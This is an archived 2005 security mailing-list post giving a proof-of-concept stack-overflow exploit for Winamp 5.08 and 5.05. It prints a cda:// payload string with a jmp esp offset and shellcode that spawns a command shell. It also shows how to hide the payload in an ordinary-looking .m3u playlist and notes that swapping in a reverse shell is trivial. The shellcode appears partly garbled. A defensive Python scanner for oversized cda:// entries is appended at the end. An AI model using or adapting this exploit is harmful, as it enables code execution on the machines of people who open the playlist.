Message-ID: <200501281222.j0SCMurs013117@lists.netsys.com>
Date: Fri, 28 Jan 2005 13:22:55 +0100
From: "Rojodos" <rojo2_bugtraq@...oo.es>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
        "full-disclosure@...ts.netsys.com" <full-disclosure@...ts.netsys.com>,
        "vulnwatch@...nwatch.org" <vulnwatch@...nwatch.org>
Subject: Winamp Exploit (POC) 5.08 Stack Overflow


Hello :)

I've coded an exploit for this vulnerability, using the advisory "NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name" as a guide. The advisory is very good, so it's very easy to code the exploit.

This code:

cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ��3�W��.�E�c�E�m�E�d�E�.�E�e�E�x�E�e�D��wP�]�S��

Should spawn a shell in a WinXP SP1 with Winamp 5.08. I have used as offset 0x5f20546e in olepro32.dll, a "jmp esp" (nT _)

��3�W��.�E�c�E�m�E�d�E�.�E�e�E�x�E�e�D��wP�]�S�� is the scode in "printable" chars.

I wrote the scode some time ago, at http://foro.elhacker.net. It's a very, very simple scode, with a hardcoded system() call (I'm a noob, sorry xD)

I have used AAAABBBBCCCC... to see how big the buffer is, and to see where the ret is overflowed (in 5.08 exactly in HIII)

In Winamp 5.05 the same code works, but the ret is "IIII", so the exploit must have another "H":

 cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHnT _IJJJ��3�W��.�E�c�E�m�E�d�E�.�E�e�E�x�E�e�D��wP�]�S��

Then, the exploit works fine in Winamp 5.05 and spawns a shell :)

I have only tested it in 5.08 and 5.05, but I think that it's easy to "port" the exploit to another version.

These codes can be saved in an archive of type m3u (Winamp playlist archive)

If you copy these codes in a text archive like this (Winamp 5.08):

#EXTM3U
#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro
cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ��3�W��.�E�c�E�m�E�d�E�.�E�e�E�x�E�e�D��wP�]�S��

(for example, I have used the "demo" archive, DJ Mike Llama, and edited the PLAY LIST ENTRY)

And save it as a *.m3u file. If you open this (in this case, I repeat, with Winamp 5.08), a cmd shell will appear :)

It's trivial to change the shellcode to make a bindport, reverse shell, etc.

Sorry about my bad English, I'm Spanish :)            (Spain exists :D)

Greets to http://www.elhacker.net  and http://foro.elhacker.net and all the people I know, especially "her" (Isthar) :)

THE REAL ELHACKER.NET! :D

Best regards. 

Rojodos

rojo2_bugtraq@...oo.es
2005-01-28
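
A defensive check for the playlist vector described in the message above, as an added example that is not part of the original post: it scans .m3u data for cda:// entries whose device name is oversized or carries non-printable bytes. The function name, the 16-byte limit and the "cda://D,1" form of an ordinary entry are assumptions, and the sample playlist is constructed.

```python
import re
import sys

# Assumption: ordinary entries are short, e.g. "cda://D,1". The post reaches the
# saved return address after 31 bytes (5.08), so 16 leaves a wide margin.
MAX_CDA_BODY = 16
CDA_RE = re.compile(rb"^\s*cda://(.*)$", re.IGNORECASE)

def scan_playlist(data: bytes):
    """Return [(line_no, [reasons])] for suspicious cda:// entries in an .m3u."""
    findings = []
    for line_no, raw in enumerate(data.splitlines(), start=1):
        match = CDA_RE.match(raw)
        if not match:
            continue
        body = match.group(1).rstrip()
        reasons = []
        if len(body) > MAX_CDA_BODY:
            reasons.append(f"device name is {len(body)} bytes, limit {MAX_CDA_BODY}")
        if any(b < 0x20 or b > 0x7E for b in body):
            reasons.append("non-printable or non-ASCII bytes in device name")
        if reasons:
            findings.append((line_no, reasons))
    return findings

# Constructed sample: one ordinary entry and one oversized entry padded with
# filler bytes (no working payload).
SAMPLE = (
    b"#EXTM3U\r\n"
    b"#EXTINF:5,Track one\r\n"
    b"cda://D,1\r\n"
    b"#EXTINF:5,Track two\r\n"
    b"cda://" + b"A" * 31 + b"\xee" * 4 + b"\r\n"
)

if __name__ == "__main__":
    # Scan files named on the command line, or the constructed sample if none.
    inputs = [(p, open(p, "rb").read()) for p in sys.argv[1:]] or [("<sample>", SAMPLE)]
    for name, data in inputs:
        for line_no, reasons in scan_playlist(data):
            print(f"{name}:{line_no}: " + "; ".join(reasons))
```

Reading the file as bytes matters here: decoding it as text first can mangle or reject the raw bytes the second check looks for.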
